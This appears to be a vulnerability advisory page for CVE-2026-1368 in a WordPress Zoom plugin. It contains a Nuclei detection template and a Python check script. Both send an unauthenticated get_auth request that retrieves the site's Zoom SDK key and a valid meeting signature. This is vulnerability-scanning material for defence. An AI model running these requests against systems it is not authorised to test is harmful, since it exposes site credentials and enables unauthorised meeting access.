
Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation

CVE-2026-1368
Verified

Description

Zoom WordPress plugin < 4.6.6 contains a broken-authentication flaw: nonce verification in the `get_auth` admin-ajax handler is disabled, so the action can be reached without a login or a request token, letting unauthenticated attackers generate valid Zoom SDK signatures for a meeting number of their choosing and retrieve the Zoom SDK key.

Severity

High

CVSS Score

7.5

Exploit Probability

33%

Published Date

April 29, 2026

Template Author

0x_akoko

CVE-2026-1368.yaml
id: CVE-2026-1368

info:
  name: Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation
  author: 0x_Akoko
  severity: high
  description: |
    Zoom WordPress plugin < 4.6.6 contains a broken-authentication flaw: nonce verification in the get_auth admin-ajax handler is disabled, so the action can be reached without a login or a request token, letting unauthenticated attackers generate valid Zoom SDK signatures for a meeting number of their choosing and retrieve the Zoom SDK key.
  impact: |
    Unauthenticated attackers can obtain a valid Meeting SDK signature for an arbitrary meeting number together with the site's SDK key, which is what a client needs to initialise the Zoom Web SDK and join that meeting under the site's integration; any passcode or waiting-room control on the meeting itself still applies.
  remediation: |
    Update to version 4.6.6 or later. The update closes the endpoint but does not invalidate signatures already issued, so if the action may have been abused, rotate the Meeting SDK credentials in the Zoom app configuration as well.
  reference:
    - https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c/
    - https://wordpress.org/plugins/video-conferencing-with-zoom-api/
    - https://plugins.trac.wordpress.org/browser/video-conferencing-with-zoom-api/
  classification:
    cve-id: CVE-2026-1368
    epss-score: 0.32922
    epss-percentile: 0.96955
    cwe-id: CWE-862
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/video-conferencing-with-zoom-api/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,zoom,vczapi,unauth,intrusive

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/video-conferencing-with-zoom-api/README.txt"

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - '(?i)Stable tag:\s*([\d.]+)'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Video Conferencing with Zoom")'
          - 'compare_versions(version, "<4.6.6")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get_auth&meeting_id=123456789

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"success\":true", "\"sig\":\"eyJ", "\"type\":\"sdk\"")'
        condition: and

    extractors:
      - type: json
        name: sdk_key
        json:
          - '.data.key'

      - type: json
        name: sdk_signature
        json:
          - '.data.sig'
# digest: 4a0a00473045022027019a3acc25a337ca4b41f0f4f2fbb4e134550b6d34b76f980f0c2dc14833670221009d043b1d8894fac49227c8b5cfd16d47c5ea4ba3e6802ed86fb1b9baba328431:922c64590222798bb761d5b6d8e72950
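The template's two-step check as a stand-alone Python script, added here as an example (it is neither the plugin's code nor part of the template): it parses the Stable tag, applies the version gate numerically, submits the `get_auth` action, and decodes the JWT-shaped signature's claims without verifying them, since only the server holds the SDK secret. The sample README and response, the placeholder SDK key and secret, and the claim names (`sdkKey`, `mn`, `role`, `exp`) are assumptions modelled on the Zoom Meeting SDK signature format; `check_site()` is the live variant, for a host you are authorised to test.

```python
"""The template's two-step check as a script: gate on the plugin version from
README.txt, then call the get_auth admin-ajax action and inspect the returned
SDK signature. Added example; not code from the plugin or the template."""
import base64, hashlib, hmac, json, re, time
import urllib.error, urllib.parse, urllib.request

FIXED_VERSION = "4.6.6"
PLUGIN_README = "/wp-content/plugins/video-conferencing-with-zoom-api/README.txt"
STABLE_TAG_RE = re.compile(r"(?i)Stable tag:\s*([\d.]+)")

def parse_stable_tag(readme_text):
    """Return the 'Stable tag' version from a WordPress plugin README, or None."""
    m = STABLE_TAG_RE.search(readme_text)
    return m.group(1) if m else None

def is_vulnerable_version(version):
    """Numeric comparison: '4.6.10' must not sort below '4.6.6' as a string would."""
    parts = lambda v: tuple(int(p) for p in v.split("."))
    return parts(version) < parts(FIXED_VERSION)

def _b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def decode_sdk_signature(sig):
    """Split a JWT-shaped signature into (header, claims) WITHOUT verifying it:
    only the server holds the SDK secret, so a client can read mn/role/exp
    but cannot check the HMAC."""
    header_b64, claims_b64, _mac = sig.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(claims_b64))

def classify_response(body):
    """The template's second matcher over a response body: success true, a
    JWT-looking 'sig' and type 'sdk'. Returns (matched, sdk_key, sig)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False, None, None
    data = doc.get("data") if isinstance(doc, dict) else None
    if not isinstance(data, dict):
        return False, None, None
    sig = data.get("sig") or ""
    matched = doc.get("success") is True and sig.startswith("eyJ") and data.get("type") == "sdk"
    return matched, data.get("key"), (sig if matched else None)

def make_sample_signature(sdk_key, sdk_secret, meeting_number, role=0, ttl=3600):
    """Mint a token in the shape of a Zoom Meeting SDK signature (HS256 JWT over
    sdkKey/mn/role/iat/exp) so the decoder can run offline. Key and secret are
    constructed placeholders, not real credentials."""
    enc = lambda o: base64.urlsafe_b64encode(json.dumps(o, separators=(",", ":")).encode()).rstrip(b"=").decode()
    now = int(time.time())
    claims = {"sdkKey": sdk_key, "mn": meeting_number, "role": role,
              "iat": now, "exp": now + ttl, "tokenExp": now + ttl}
    signing_input = enc({"alg": "HS256", "typ": "JWT"}) + "." + enc(claims)
    mac = hmac.new(sdk_secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + base64.urlsafe_b64encode(mac).rstrip(b"=").decode()

def check_site(base_url, meeting_id="123456789", timeout=10):
    """Live two-request check, for a site you are authorised to test."""
    base = base_url.rstrip("/")
    try:
        with urllib.request.urlopen(base + PLUGIN_README, timeout=timeout) as r:
            readme = r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError:
        return {"plugin_found": False}
    version = parse_stable_tag(readme)
    if not version or "Video Conferencing with Zoom" not in readme or not is_vulnerable_version(version):
        return {"plugin_found": bool(version), "version": version, "vulnerable": False}
    form = urllib.parse.urlencode({"action": "get_auth", "meeting_id": meeting_id}).encode()
    req = urllib.request.Request(base + "/wp-admin/admin-ajax.php", data=form,
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as r:
        matched, key, sig = classify_response(r.read().decode("utf-8", "replace"))
    result = {"plugin_found": True, "version": version, "vulnerable": matched, "sdk_key": key}
    if matched:
        result["claims"] = decode_sdk_signature(sig)[1]
    return result

# Constructed sample inputs so the decision path runs offline (not captured from a real site).
SAMPLE_README = "=== Video Conferencing with Zoom ===\nRequires at least: 5.0\nStable tag: 4.6.5\n"
SAMPLE_RESPONSE = json.dumps({"success": True, "data": {"key": "sample-sdk-key", "type": "sdk",
    "sig": make_sample_signature("sample-sdk-key", "sample-sdk-secret", "123456789")}})

def offline_demo():
    """Same decision path as check_site(), over the constructed samples."""
    version = parse_stable_tag(SAMPLE_README)
    matched, key, sig = classify_response(SAMPLE_RESPONSE)
    return {"version": version, "vulnerable": is_vulnerable_version(version) and matched,
            "sdk_key": key, "claims": decode_sdk_signature(sig)[1] if matched else None}

if __name__ == "__main__":
    print(json.dumps(offline_demo(), indent=2))
```

Decoding the claims is what turns a matched response into a useful finding: `mn` shows which meeting the signature was minted for and `role` whether it grants attendee (0) or host (1) privileges, and `exp` bounds how long the token stays usable after the site is patched.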

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2026-1368
CWE ID:
CWE-862

References

https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c/
https://wordpress.org/plugins/video-conferencing-with-zoom-api/
https://plugins.trac.wordpress.org/browser/video-conferencing-with-zoom-api/

Remediation Steps

Update to version 4.6.6 or later. The update closes the endpoint but does not invalidate signatures already issued, so if the action may have been abused, rotate the Meeting SDK credentials in the Zoom app configuration as well.